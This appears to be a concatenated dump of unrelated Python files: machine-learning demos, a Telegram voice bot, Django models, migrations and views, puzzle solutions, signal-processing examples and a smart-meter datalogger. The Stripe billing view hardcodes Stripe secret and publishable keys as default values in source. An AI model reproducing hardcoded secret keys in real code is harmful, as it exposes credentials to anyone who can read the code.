        p=np.exp(exp_coef)/(np.power(2*np.pi,mu.shape[0]/2)*np.sqrt(np.linalg.det(cov)))
        return p
if __name__=='__main__':
    # Watermelon data set 4.0 (30 two-dimensional samples).
    X=np.array([[0.697,0.460],[0.774,0.376],[0.634,0.264],[0.608,0.318],[0.556,0.215],
                [0.403,0.237],[0.481,0.149],[0.437,0.211],[0.666,0.091],[0.243,0.267],
                [0.245,0.057],[0.343,0.099],[0.639,0.161],[0.657,0.198],[0.360,0.370],
                [0.593,0.042],[0.719,0.103],[0.359,0.188],[0.339,0.241],[0.282,0.257],
                [0.748,0.232],[0.714,0.346],[0.483,0.312],[0.478,0.437],[0.525,0.369],
                [0.751,0.489],[0.532,0.472],[0.473,0.376],[0.725,0.445],[0.446,0.459]])
    X_test=X
    gmm=GaussianMixture(k=3,max_iter=50)
    gmm.fit(X)
    print(gmm.C)
    print(gmm.labels_)
    print(gmm.predict(X_test))
    plt.scatter(X[:, 0], X[:, 1], c=gmm.labels_)
    plt.scatter(gmm.mu[:, 0], gmm.mu[:, 1],c=range(gmm.k), marker='+')
    plt.title('tinyml')
    plt.show()
    # Cross-check against scikit-learn. NOTE: this import shadows the local
    # GaussianMixture class for the remainder of the block.
    from sklearn.mixture import GaussianMixture
    sklearn_gmm = GaussianMixture(n_components=3, covariance_type='full',
                                  max_iter=50).fit(X)
    labels=sklearn_gmm.predict(X)
    print(labels)
    plt.scatter(X[:,0],X[:,1],c=labels)
    plt.title('sklearn')
    plt.show()
|
21,955 | b102f34f6c40aded51011c308fbeed83e9ce11ee | ML_APP_DARK_BLUE = '#282774'
|
21,956 | 3520812eff1d5aea0ca4490fabbb03cef79d8cea | from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
import speech_recognition as sr
from pydub import AudioSegment
import pydub
from gtts import gTTS
#default commands handlers
def start(update, context):
    """Reply to the /start command with a greeting."""
    greeting = 'welcome to voice bot'
    update.message.reply_text(greeting)
def help_command(update, context):
    """Reply to the /help command with a short description of the bot."""
    description = 'I am a Voice bot'
    update.message.reply_text(description)
#custom commands handler and outputs
def echo(update, context):
    """Echo any plain-text message straight back to the sender."""
    update.message.reply_text(update.message.text)
# converting speech to text
#initial_voice os the audio file user sent to bot
def speech_to_text(initial_voice):
    """Download a Telegram voice file, convert it .oga -> .wav, and return the
    text recognized by Google Speech Recognition (Indian English)."""
    r = sr.Recognizer()
    # Download the file in .oga format (Telegram's voice format).
    initial_voice.download("hello.oga")
    # Google speech recognition does not accept .oga, so convert to .wav with
    # pydub. pydub needs the ffmpeg binary to do the conversion —
    # MAKE SURE YOU HAVE ffmpeg.exe IN YOUR WORKING DIRECTORY.
    pydub.AudioSegment.ffmpeg = "path to ffmpeg.exe file/ffmpeg"
    # Convert the .oga audio to .wav.
    AudioSegment.from_file("hello.oga").export("input_audio2.wav", format="wav")
    # Use the generated wav file as the recognizer's source.
    with sr.WavFile("input_audio2.wav") as source:
        # Record the audio data from the source.
        audio_data = r.record(source)
        try:
            # Recognize (convert from speech to text).
            text = r.recognize_google(audio_data,language='en-IN')
            return text
        # Any recognition error is reported to the user as a fixed message.
        except:
            return "Sorry...the audio file is not clear enough to extract the text"
def text_to_speech(text):
    """Synthesize `text` to output_audio1.mp3 and re-export it as .ogg."""
    speech = gTTS(text=text, lang='en')
    speech.save("output_audio1.mp3")
    # Telegram voice messages use ogg, so convert the mp3.
    AudioSegment.from_file("output_audio1.mp3").export("output_audio2.ogg", format="ogg")
    print('saved')
#triggers when the bot receives audio file, NOTE THAT THE AUDIO FORMAT SUPPORTED BY TELEGRAM IS oga.
#so,you get your audio file in ogg format
def voice_handler(update, context):
    """Transcribe an incoming voice message and reply with the text."""
    # Telegram delivers voice notes in .oga; fetch the file handle first.
    voice_file = context.bot.getFile(update.message.voice.file_id)
    transcript = speech_to_text(voice_file)
    update.message.reply_text(transcript)
#main handler, heart of the bot where you filter the voice message and handle them
# refer https://python-telegram-bot.readthedocs.io/en/stable/telegram.ext.html for documentation
def main():
    """Configure the bot's handlers and poll for updates.

    Restarts polling after an unexpected error instead of crashing.
    """
    # BUG FIX: the original wrapped everything in a bare `except:` that
    # recursively called main(). That grows the call stack without bound on
    # repeated failures and, because a bare except also traps
    # KeyboardInterrupt/SystemExit, made the bot impossible to stop.
    # A loop with `except Exception` keeps the restart behaviour safely.
    while True:
        try:
            # Configure the updater with your bot token.
            updater = Updater("your bot token here", use_context=True)
            # The dispatcher routes incoming updates to handlers.
            dp = updater.dispatcher
            # CommandHandler handles command messages (/start, /help, ...).
            dp.add_handler(CommandHandler("start", start))
            dp.add_handler(CommandHandler("help", help_command))
            # MessageHandler + Filters routes non-command messages:
            # Filters.text -> plain text, Filters.voice -> voice notes.
            dp.add_handler(MessageHandler(Filters.text, echo))
            dp.add_handler(MessageHandler(Filters.voice, voice_handler))
            # Start getting updates from the bot; idle() blocks until stopped.
            updater.start_polling()
            updater.idle()
            return
        except Exception:
            # Unexpected failure (webhook errors etc.): restart polling.
            continue
#call the main function
print("bot started on sever")
main()
|
21,957 | e716df5964411ebde921cda8b05e03ebd3b805eb | # Flake8 Plugin for Python-Builder
#
# Copyright 2012 The Python Builder Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Plugin for Tarek Ziade's flake8 script.
Flake8 is a wrapper around: PyFlakes, pep8, Ned's McCabe script.
https://bitbucket.org/tarek/flake8
"""
__author__ = 'Michael Gruber'
from pythonbuilder.core import after, task, use_plugin
from pythonbuilder.utils import assert_can_execute, read_file
from pythonbuilder.plugins.python.python_plugin_helper import execute_tool_on_source_files
use_plugin("python.core")
@after("prepare")
def assert_flake8_is_executable(logger):
    """Fail the build early if the flake8 command cannot be executed."""
    logger.debug("Checking if flake8 is executable.")
    assert_can_execute(
        command_and_arguments=("flake8",),
        prerequisite="flake8",
        caller="plugin python.flake8",
    )
@task
def analyze(project, logger):
    """Run flake8 over the project sources and log the warning count."""
    logger.info("Applying flake8 to project sources.")
    # execute_tool_on_source_files returns a result tuple whose second
    # element is the path of the generated report file.
    report_file = execute_tool_on_source_files(
        project=project,
        name="flake8",
        command_and_arguments=["flake8"],
    )[1]
    warnings_found = len(read_file(report_file))
    if warnings_found > 0:
        logger.warn("flake8 found %d warning(s).", warnings_found)
|
21,958 | 327a0911e3990255668c59268bcdd88f9f69fa43 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-27 11:55
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial blog schema: ArticleModel, Classify and TagModel tables, plus
    the article -> classify foreign key and the article <-> tag many-to-many.

    Auto-generated by Django; do not hand-edit applied migrations.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='ArticleModel',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=50, verbose_name='title')),
                ('head_img', models.CharField(max_length=150, verbose_name='hand image')),
                ('quote_title', models.CharField(blank=True, max_length=100, null=True, verbose_name='quote title')),
                ('quote', models.TextField(verbose_name='quote')),
                ('quote_cite', models.CharField(blank=True, max_length=40, null=True, verbose_name='quote_cite')),
                ('quote_footer', models.CharField(blank=True, max_length=100, null=True, verbose_name='quote_footer')),
                ('article_md', models.TextField(verbose_name='markdown article text')),
                ('article_html', models.TextField(default='', verbose_name='html article text')),
                ('is_valid', models.BooleanField(default=True, verbose_name='if is valid')),
                ('create_time', models.DateTimeField(verbose_name='create time')),
                ('modify_time', models.DateTimeField(auto_now=True, verbose_name='modify time')),
                ('pinyin_title', models.CharField(default='', max_length=100, verbose_name='initial pinyin title')),
            ],
            options={
                'db_table': 'article',
            },
        ),
        migrations.CreateModel(
            name='Classify',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=20, verbose_name='classification name')),
            ],
            options={
                'db_table': 'classify',
            },
        ),
        migrations.CreateModel(
            name='TagModel',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('tag', models.CharField(max_length=20, verbose_name='article tag')),
            ],
            options={
                'db_table': 'tag',
            },
        ),
        migrations.AddField(
            model_name='articlemodel',
            name='classify',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='article', to='blog.Classify'),
        ),
        migrations.AddField(
            model_name='articlemodel',
            name='tag',
            field=models.ManyToManyField(related_name='article', to='blog.TagModel'),
        ),
    ]
|
21,959 | 5669865b6f746616c7f63427902f990c9fe3fa59 | #!/usr/bin/env python
__author__ = "Thomas Kargul"
def revenge():
    """Solve Code Jam 'Revenge of the Pancakes': for each test case, count the
    flips needed to turn every pancake happy-side ('+') up.

    NOTE(review): Python 2 code (raw_input); indentation reconstructed from a
    whitespace-mangled source — verify nesting against the original file.
    """
    numOfInput = int(raw_input())  # 1 <= T <= 100
    inputS = []  # list of strings, one per test case
    for i in range(numOfInput):
        inp = raw_input()
        inputS.append(inp)

    # flipping = reversing a string, and "inverse"
    def flip(pancakes):
        pancakes.reverse()
        for i, p in enumerate(pancakes):
            pancakes[i] = "+" if p == "-" else "-"
        #flipCount += 1
        return pancakes

    # find how many + are at the end of the string,
    # since they are already +, don't flip these
    # flip goes from [0] -> index before first + in the last consecutive group of +
    def findBackCount(S):
        backCount = len(S)
        for i, sign in reversed(list(enumerate(S))):
            if sign == "+":
                backCount = i
            else:
                break
        return backCount  # index of first rear set of +

    # find the number of + in beginning, these will be flipped to -
    # before the bigger flip, so after the bigger flip they will
    # be on bottom and be + again
    def findFrontPlus(S):
        frontPlus = 0
        if S[0] == "+":
            for sign in S:
                if sign == "+": frontPlus += 1
                else: break
        return frontPlus

    # if no -, then all pancakes are flipped to + aka happy side
    def allHappy(S):
        for sign in S:
            if sign == "-": return False
        return True

    for case, strS in enumerate(inputS):
        S = list(strS)
        flipCount = 0  # reset for each S in inputs
        while not allHappy(S):
            backCount = findBackCount(S)
            frontPlus = findFrontPlus(S)
            if frontPlus > 0:
                # flip front +'s to -'s before the bigger flip
                frontS = S[0:frontPlus:]
                backS = S[frontPlus::]
                frontS_flipped = flip(frontS)
                flipCount += 1
                S = frontS_flipped + backS
            # bigger flip
            if backCount < len(S):
                frontS = S[0:backCount:]
                backS = S[backCount::]
                frontS_flipped = flip(frontS)
                flipCount += 1
                S = frontS_flipped + backS
            else:
                # there are no + at the back
                S = flip(S)
                flipCount += 1
        print("Case #{}: {}".format(case+1, flipCount))
# Algorithm sketch:
# go as far down the stack until EOS or only "+"s left
# if + on top*** and - on bottom, flip top first so that it becomes -
# and thus becomes a + when the stack is flipped
# i.e +++-- > -++-- > ++--+
# *** or flip entire consecutive +'s on top so they become -'s before flip,
# then +'s again after flip
# find pancakes to be flipped then
# send S[0:end_of_flip: ] to flip()
# return of flip().append( S[end_of_flip:len(S): ] )
if __name__ == '__main__':
    revenge()
21,960 | cf60524d11fd5a76257bd8979a51c0263644fa5e | #!/usr/bin/env python3
"""1000-digit Fibonacci number"""
from math import log10
from fibonacci import FibonacciSeries
MAX_DIGITS = 1000


def main():
    """Print the index of the first Fibonacci term with MAX_DIGITS digits."""
    for term in FibonacciSeries():
        # A value v has at least MAX_DIGITS digits when log10(v) + 1 crosses
        # the threshold (kept in this exact float form for parity).
        if log10(term.value) + 1 >= MAX_DIGITS:
            print(term.index)
            break


if __name__ == '__main__':
    main()
|
21,961 | eaf05e9e69df0cc59dddeda2e569bb71b568e4b5 | from django.conf import settings
from django.db import models
from userroles import roles
class UserRole(models.Model):
    """One-to-one role record for a user (Python 2 / legacy Django code).

    `name` must be one of the choices declared on the module-level `roles`
    registry; `child` optionally names a related profile sub-model.
    """
    user = models.OneToOneField(settings.AUTH_USER_MODEL, related_name='role')
    name = models.CharField(max_length=100, choices=roles.choices)
    child = models.CharField(max_length=100, blank=True)
    _valid_roles = roles

    @property
    def profile(self):
        # The child attribute, when set, is the name of the reverse relation
        # to a role-specific profile model.
        if not self.child:
            return None
        return getattr(self, self.child)

    def __eq__(self, other):
        # Roles compare equal by name only.
        return self.name == other.name

    def __getattr__(self, name):
        # Dynamic `is_<rolename>` checks, e.g. role.is_manager; falls back to
        # delegating unknown attributes to the role object itself.
        # NOTE(review): relies on a `subrole_of` method not visible in this
        # file — confirm it exists on the model or role objects.
        if name.startswith('is_'):
            role = getattr(self._valid_roles, name[3:], None)
            if role:
                return self == role or self.subrole_of( role )
        role = roles.get(self.name)
        if hasattr(role, name):
            return getattr(role, name)
        raise AttributeError("'%s' object has no attribute '%s'" %
            (self.__class__.__name__, name))

    def __unicode__(self):
        return self.name
def set_user_role(user, role):
    """Assign `role` (a role object or its name) to `user`, creating or
    updating the user's UserRole record."""
    if isinstance(role, basestring):
        role_name = role
    else:
        role_name = role.name
    try:
        profile = UserRole.objects.get(user=user)
    except UserRole.DoesNotExist:
        # No record yet: create one pre-populated with the role name.
        profile = UserRole(user=user, name=role_name)
    else:
        profile.name = role_name
    profile.save()
|
21,962 | 34443451d5ac643cef9816d6bc78f42ab0047608 | from django.conf import settings
from django.shortcuts import render , redirect
from django.http import JsonResponse, HttpResponse
from django.utils.http import is_safe_url
import stripe
from .models import BillingProfile, Card
STRIP_SECRET_KEY = getattr(settings, "STRIP_SECRET_KEY",'sk_test_dcQwZSOCpgPbOkLHaStIMRIs')
STRIPE_PUB_KEY= getattr(settings, "STRIPE_PUB_KEY",'pk_test_dIXXyNLLFIHbCRidgDWEiSOL')
stripe.api_key = STRIP_SECRET_KEY
def payment_method_view(request):
    """Render the card-entry page, passing the Stripe publishable key and a
    validated post-save redirect target."""
    billing_profile, _created = BillingProfile.objects.new_or_get(request)
    if not billing_profile:
        return redirect('/cart/')
    next_url = None
    requested_next = request.GET.get('next')
    # Only honour same-host redirect targets to avoid open redirects.
    if is_safe_url(requested_next, request.get_host()):
        next_url = requested_next
    context = {"publish_key": STRIPE_PUB_KEY, 'next_url': next_url}
    return render(request, 'billing/payment-method.html', context)
def payment_method_createview(request):
    """AJAX endpoint that attaches a new Stripe card to the billing profile.

    Expects a POST with a `token` field (the Stripe card token).
    """
    if request.method=="POST" and request.is_ajax():
        billing_profile, billing_profile_created = BillingProfile.objects.new_or_get(request)
        if not billing_profile:
            # BUG FIX: HttpResponse has no `status_code` keyword (TypeError at
            # runtime) and would str() the dict; return JSON with status=401.
            return JsonResponse({"message":"Cannot find this user"}, status=401)
        # If unsure what the POST contains, inspect request.POST.
        token = request.POST.get("token")
        if token is not None:
            # Persist the card in our database as well.
            new_card_obj = Card.objects.add_new(billing_profile, token)
            return JsonResponse({"message":"Success , your card is added!"})
    # BUG FIX: same invalid `status_code` keyword replaced with `status`.
    return HttpResponse("error", status=401)
|
21,963 | 7c06241ff2a6a89c68e8a8a271c0b5139dddb8bd | # Variables
# Basics types
# Operation on numbers
# Operation on string
# Numbers and String
number1 = 10
number2 = 7
string1 = "hello"

# Demonstrate each arithmetic operator in turn: + - * / % ** //
for outcome in (
    number1 + number2,
    number1 - number2,
    number1 * number2,
    number1 / number2,
    number1 % number2,
    number1 ** number2,
    number1 // number2,
):
    print(outcome)
21,964 | 4c02aaac96a4e5049e51f3a9afe8076a23f8d900 | #Inicio
# Start: show the menu and read the chosen option.
print('Bienvenido a mi programa')
inicio=input('Pulsa 1 para contar palabras, Pulsa 2 para comprobar palindromos, Pulsa 3 para deletrear|')
# Option 1: character counter (counts characters despite the "words" label).
if inicio == ('1'):
    Texto1 = input('Introduce el texto:')
    Contador=(len (Texto1))
    print('Este texto tiene', Contador,'caracteres')
# Option 2: palindrome check via slice reversal.
if inicio == ('2'):
    Cadena1 = input('Introduce la palabra:')
    Cadena2 = Cadena1[::-1]
    print(Cadena1, 'al revés es', Cadena2)
    if Cadena1==Cadena2:
        print('Por lo tanto', Cadena1,'es un palindromo')
    else:
        print('Por lo tanto', Cadena1, 'no es un palindromo')
# Option 3: spell the word one character per line.
if inicio==('3'):
    Deletrear=input('Escribe tu palabra:')
    palabra=Deletrear
    # Iterating a string yields one character per loop turn.
    for (palabra) in (Deletrear):
        print(palabra)
21,965 | 5bb7edf3141273d60ebb49c31e646be864736f5f | import math
def is_prime(num, primes):
    """Trial-division primality test against a list of known primes.

    `primes` is expected to contain, in ascending order, every prime up to
    sqrt(num) (the callers in this script build it incrementally, so the
    invariant holds there).
    """
    root = int(math.sqrt(num))
    if num == 0 or num == 1:
        return False
    if num == 2:
        return True
    if num in primes:
        return True
    for p in primes:
        if p > root:
            return True
        elif num % p == 0:
            return False
    # BUG FIX: the original fell off the end and implicitly returned None
    # when every known prime was <= root but none divided num — yet such a
    # num is prime (e.g. is_prime(29, [2, 3, 5]) returned None).
    return True
# for problem 7 - finds the nth prime number
def find_number_prime(n):
    """Return the n-th prime number (Project Euler problem 7)."""
    primes = [2]
    # Only odd candidates need checking; start at 1 (rejected by is_prime).
    candidate = 1
    while len(primes) < n:
        if is_prime(candidate, primes):
            primes.append(candidate)
        candidate += 2
    return primes[-1]
# Problem 7: print the 10001st prime.
print(find_number_prime(10001))
# for problem 10
def find_prime_sum(maxNum):
    """Sum all primes below maxNum (Project Euler problem 10).

    The loop appends one prime >= maxNum before it stops, so that final
    (overshooting) prime is subtracted from the total.
    """
    primes = [2]
    candidate = 1
    while primes[-1] < maxNum:
        if is_prime(candidate, primes):
            primes.append(candidate)
        candidate += 2
    print(primes[-1])
    # BUG FIX: the original returned `sum - prime[-1]`, which indexed the
    # integer loop variable (TypeError) and shadowed the builtin `sum`;
    # accumulate into `total` and subtract the last (overshooting) prime.
    total = 0
    for prime in primes:
        total += prime
    return total - primes[-1]
# Problem 10: sum of all primes below two million.
print ("##########")
print (find_prime_sum(2000000))
21,966 | e39374232646782ec4ddfe837848cb5eb259b9fe | '''
信号测量的结果包括测量编号和测量值。存在信号测量结果丢弃及测量结果重复的情况。
1.测量编号不连续的情况,认为是测量结果丢弃。对应测量结果丢弃的情况,需要进行插值操作以更准确的评估信号。
采用简化的一阶插值方法,由丢失的测量结果两头的测量值算出两者中间的丢失值。
假设第M个测量结果的测量值为A,第N个测量结果的测量值为B。则需要进行(N-M-1)个测量结果的插值处理。
进行一阶线性插值估计的第N+i个测量结果的测量值为A+( (B-A)/(N-M) )*i (注:N的编号比M大。)
例如:只有测量编号为4的测量结果和测量编号为7的测量结果,测量值分别为4和10
则需要补充测量编号为5和6的测量结果。
其中测量编号为5的测量值=4 + ((10-4)/(7-4))*1 = 6
其中测量编号为6的测量值=4 + ((10-4)/(7-4))*2 = 8
2.测量编号相同,则认为测量结果重复,需要对丢弃后来出现的测量结果。
请根据以上规则进行测量结果的整理。
输入描述:
输入说明
1 输入两个整数m, n
2 输入m个数据组
输出描述:
输出整理后的结果
'''
def bubbleSort(list_r):
    """Sort ``list_r`` in place, ascending, using bubble sort.

    Fixes: the original compared ``list_r[i] > list_r+1`` (list + int ->
    TypeError); the neighbour element ``list_r[i+1]`` was intended.  The
    outer loop ``range(1, len-1)`` also did zero passes for lists of
    length <= 2; we run the standard len-1 passes.
    """
    n = len(list_r)
    for _ in range(n - 1):
        for i in range(n - 1):
            if list_r[i] > list_r[i + 1]:
                list_r[i], list_r[i + 1] = list_r[i + 1], list_r[i]
'''
def signalOP():
group=input()
groupList=list(map(int,group.split()))
M=groupList[0]
N=groupList[1]
if N<=M:
print("信号错误")
# signalDict={}
signalList=[]
# count=0
for i in range(M):
# if count>M:
# break
# else:
signalIn = input()
# listG=list(map(int,signalIn.split()))
order,ord_value=[int(j) for j in signalIn.split()]
# if listG[0] not in signalDict:
if len(signalList)>0:
if signalList[-1][0]==order:
count += 1
# signalDict[listG[0]]=listG[1]
signalList.append((listG[0],listG[1]))
else:
continue
differene=N-M-1
for j in range(differene):
i=j+1
order=N+i
valueM_A=signalDict[signalList[M-1]]
valueN_B=signalDict[signalList[N-1]]
ord_value=valueM_A+( (valueN_B-valueM_A)/(N-M) )*i
signalDict[order]=ord_value
signalList.append(order)
bubbleSort(signalList)
for i in signalList:
print("%s %s"%(i,signalDict[i]))
'''
import math
def insertNum(M, N, signalList):
    """Append linearly interpolated measurements to ``signalList``.

    ``M`` is the next measurement's number and ``N`` its value; the gap
    between the list's last entry and ``M`` is filled with a truncated
    first-order interpolation, one ``[number, value]`` pair per missing slot.
    """
    prev_order, prev_value = signalList[-1]
    slope = math.trunc((N - prev_value) / (M - prev_order))
    for offset in range(1, M - prev_order):
        signalList.append([prev_order + offset, prev_value + slope * offset])
def signalOP():
    """Read one measurement set from stdin, clean it, and print the result.

    The first input line holds ``m`` (row count) and ``n``; the next ``m``
    lines each hold "number value".  Duplicate measurement numbers keep only
    the first occurrence; gaps in the numbering are filled by insertNum's
    linear interpolation.
    """
    header = list(map(int, input().split()))
    m, n = header[0], header[1]
    if n <= m:
        print("信号错误")
    readings = []
    for _ in range(m):
        order, value = [int(tok) for tok in input().split()]
        if readings:
            last_order = readings[-1][0]
            if last_order == order:
                # Duplicate measurement number: discard the later one.
                continue
            if last_order + 1 < order:
                # Missing measurements: interpolate before appending.
                insertNum(order, value, readings)
        readings.append([order, value])
    for order, value in readings:
        print("%s %s" % (order, value))
# Process data sets until input is exhausted; EOF (or any parse error)
# raises inside signalOP() and ends the loop.
while True:
    try:
        signalOP()
    except:
        break
|
# A small record describing one person; print each stored field in order.
person = {
    'first_name': 'zoctopus',
    'last_name': 'zhang',
    'age': 21,
    'city': 'chengdu',
}
for field in ('first_name', 'last_name', 'age', 'city'):
    print(person[field])
21,968 | 3f3caa173b999a0f0cc53f4ec36b22b1a9ccce46 | from geopy.geocoders import Nominatim
def get_location(latitude, longitude):
    """Reverse-geocode a coordinate pair into a Nominatim address dict.

    ``latitude`` and ``longitude`` are joined as "lat, lon" strings.  When
    Nominatim cannot reverse geocode, a placeholder with country "n/a" is
    returned; otherwise the raw response's "address" mapping.
    """
    coordinates = latitude + ", " + longitude
    geocoder = Nominatim(user_agent="tynrGeocoder")
    place = geocoder.reverse(coordinates)
    # Nominatim returns None when unable to reverse geocode.
    if place is None:
        return {"country": "n/a"}
    return place.raw["address"]
|
21,969 | c137935946508166409ea6e6ed8430b67239d583 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# example_parallel_chains.py
# Jan 27, 2015 10:45:00 EST
# Copyright 2015
#
# Andre Young <andre.young@cfa.harvard.edu>
# Harvard-Smithsonian Center for Astrophysics
# 60 Garden Street, Cambridge
# MA 02138
#
# Changelog:
# AY: Created 2015-01-27
"""
Simple example to illustrate the use of parallel signal chains.
A multitone signal is used as input to two parallel signal processing
paths. Each path consists of two chains. The first chain consists of an
analog delay and flat gain, the parameters of which are different for each
parallel path. The second chain consists of a frequency phase and magnitude
slope, which is use the same parameters for both parallel paths.
The input contains a 1GHz and 4GHz sinusoid. The delay is a quarter period (1GHz),
positive for one path and negative for the other. The flat gain is 1.2 for
the one path and 0.8 for the other. The phase slope implements a half-period
delay (1GHz) and the magnitude slope effectively removes the 4GHz tone.
"""
# some useful libraries to import
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
# import SimSWARM modules
import SimSWARM.Signal as sg
import SimSWARM.Blocks as bl
# turn interactive plot on
plt.interactive(True)
def main():
    """Build a two-tone signal, feed it through two parallel chains, and plot.

    NOTE: this file is Python 2 (print statement / raw_input below).
    """
    # The signals herein are mostly encapsulated in AnalogSignal
    # instances which need to be sampled in order to visualize.
    # The sampling characteristics for this purpose are defined below.
    rate = 64.0e9 # samples per second
    num_of_samples = 128
    time_start = 0 # sample from t=0
    tvec = np.arange(time_start,1.0*num_of_samples/rate,1.0/rate)
    # scale tvec to nanoseconds
    tvec = tvec*1.0e9
    # Create the multitone signal: a large 1 GHz tone plus a small 4 GHz tone.
    soi_list = list()
    tone_frequencies = (1.0e9,4.0e9)
    tone_amplitudes = (1.0,0.1)
    tone_phases = 0.0
    for ii in range(0,len(tone_frequencies)):
        tone_frequency = tone_frequencies[ii]
        tone_amplitude = tone_amplitudes[ii]
        tone_generator = sg.SinusoidGenerator(tone_amplitude,tone_frequency,tone_phases)
        soi_list.append(sg.AnalogSignal(tone_generator))
    combiner_block = bl.AnalogCombiner()
    combiner_block.attach_source(soi_list)
    # Build the first chain (separate parameters per antenna).
    # for antenna 1
    ant1_delay = 0.25/1.0e9 # quarter period delay at 1GHz
    ant1_flat_gain = 1.2
    chain1_1 = build_chain_separate(ant1_delay,ant1_flat_gain)
    # and for antenna 2
    ant2_delay = -0.25/1.0e9 # quarter period advance at 1GHz
    ant2_flat_gain = 0.8
    chain1_2 = build_chain_separate(ant2_delay,ant2_flat_gain)
    # Create Parallel using list - used when the blocks in each
    # parallel path are different
    par1 = bl.Parallel(list((chain1_1,chain1_2)))
    # Build the second chain (common parameters for both paths).
    both_phase_slope = 0.5e-9 # half period delay at 1GHz
    both_magnitude_slope = -10 # dB/GHz; effectively removes the 4GHz tone
    chain2 = build_chain_common(both_phase_slope,both_magnitude_slope)
    # Create Parallel using single block - used when the blocks in each
    # parallel path is the same
    par2 = bl.Parallel(chain2,n=2) # have to specify n, the number of paths
    # Connect the signal path: combiner -> par1 -> par2.
    par1.attach_source(combiner_block)
    par2.attach_source(par1)
    # Generate output of each parallel stage.
    out1 = par1.output()
    out2 = par2.output()
    # Plot the input and both stage outputs.
    plt.figure()
    plt.plot(tvec,combiner_block.output().sample(rate,num_of_samples,time_start),label='SoI')
    plt.legend()
    plt.title('Signal with large 1GHz and small 4GHz component, both start at 0deg phase.')
    plt.xlabel('Time [ns]')
    plt.show()
    plt.figure()
    plt.plot(tvec,out1[0].sample(rate,num_of_samples,time_start),'--',label='Chain 1 (channel 1)')
    plt.plot(tvec,out1[1].sample(rate,num_of_samples,time_start),'--',label='Chain 1 (channel 2)')
    plt.legend()
    plt.title('Output of first chain: 1.2 gain + delay (channel 1) and 0.8 gain + advance (channel 2)')
    plt.xlabel('Time [ns]')
    plt.show()
    plt.figure()
    plt.plot(tvec,out2[0].sample(rate,num_of_samples,time_start),'--',label='Chain 2 (channel 1)')
    plt.plot(tvec,out2[1].sample(rate,num_of_samples,time_start),'--',label='Chain 2 (channel 2)')
    plt.legend()
    plt.title('Output of second chain: 4GHz removed and phase inversion.')
    plt.xlabel('Time [ns]')
    plt.show()
    # wait for input before closing (Python 2 syntax)
    print "Press ENTER to exit."
    raw_input()
    return 0
def build_chain_separate(delay,flat_gain):
    """
    Build and return a signal processing block chain.

    The chain applies an analog delay followed by a flat gain, in that order.

    Arguments:
    delay -- Delay block parameter.
    flat_gain -- Flat gain block parameter
    """
    result = bl.Chain()
    for block in (bl.AnalogDelay(delay), bl.AnalogGain(flat_gain)):
        result.add_block(block)
    return result
def build_chain_common(phase_slope,magnitude_slope):
    """
    Build and return a signal processing block chain.

    The chain applies a frequency-domain phase slope followed by a
    magnitude slope.

    Arguments:
    phase_slope -- The phase gradient parameter.
    magnitude_slope -- The magnitude gradient parameter.
    """
    result = bl.Chain()
    for block in (bl.AnalogFrequencyPhaseSlope(phase_slope), bl.AnalogFrequencyGainSlope(magnitude_slope)):
        result.add_block(block)
    return result
if __name__ == '__main__':
main()
|
21,970 | 17d4db2ae9595483d89adc863bf459b24fba0cdd | #!/usr/bin/env python3
"""
https://dsmr-reader.readthedocs.io/en/latest/installation/datalogger.html
Installation:
pip3 install pyserial==3.4 requests==2.24.0 python-decouple==3.3
"""
import datetime
import logging
import time
import re
import serial
import requests
import decouple
logger = logging.getLogger('dsmrreader')
def read_telegram(url_or_port, telegram_timeout, **serial_kwargs): # noqa: C901
    """ Opens a serial/network connection and reads it until we have a full telegram. Yields the result.

    Raises RuntimeError when the connection cannot be opened, or when no
    telegram is detected within ``telegram_timeout`` seconds.
    """
    MAX_BYTES_PER_READ = 2048
    MAX_READ_TIMEOUT = 1.0 / 3  # Will cancel read() if it does not receive MAX_BYTES_PER_READ Bytes in time.
    logger.info(
        '[%s] Opening connection "%s" using options: %s',
        datetime.datetime.now(),
        url_or_port,
        serial_kwargs
    )
    try:
        serial_handle = serial.serial_for_url(url=url_or_port, timeout=MAX_READ_TIMEOUT, **serial_kwargs)
    except Exception as error:
        # Fix: the original passed the template unformatted — RuntimeError('...{}', error)
        # — so the message never contained the underlying error. Format it and chain the cause.
        raise RuntimeError('Failed to connect: {}'.format(error)) from error
    buffer = ''
    start_timestamp = time.time()
    while True:
        # Abort the infinite loop at some point.
        if time.time() - start_timestamp > telegram_timeout:
            raise RuntimeError(
                'It took too long to detect a telegram. Check connection params. Bytes currently in buffer: {}'.format(
                    len(buffer)
                )
            )
        incoming_bytes = serial_handle.read(MAX_BYTES_PER_READ)
        logger.debug('[%s] Read %d Byte(s)', datetime.datetime.now(), len(incoming_bytes))
        if not incoming_bytes:
            continue
        incoming_data = str(incoming_bytes, 'latin_1')
        # Just add data to the buffer until we detect a telegram in it.
        buffer += incoming_data
        # Should work for 99% of the telegrams read. The checksum bits are optional due to legacy meters omitting them.
        match = re.search(r'(/[^/]+![A-Z0-9]{0,4})', buffer, re.DOTALL)
        if not match:
            continue
        yield match.group(1)
        # Reset for next iteration.
        buffer = ''
        serial_handle.reset_input_buffer()
        start_timestamp = time.time()
def _send_telegram_to_remote_dsmrreader(telegram, api_url, api_key, timeout):
    """ Registers a telegram by simply sending it to the application with a POST request. """
    logger.debug('[%s] Sending telegram to API: %s', datetime.datetime.now(), api_url)
    # The timeout prevents this script from hanging indefinitely when the
    # server or network is unavailable.
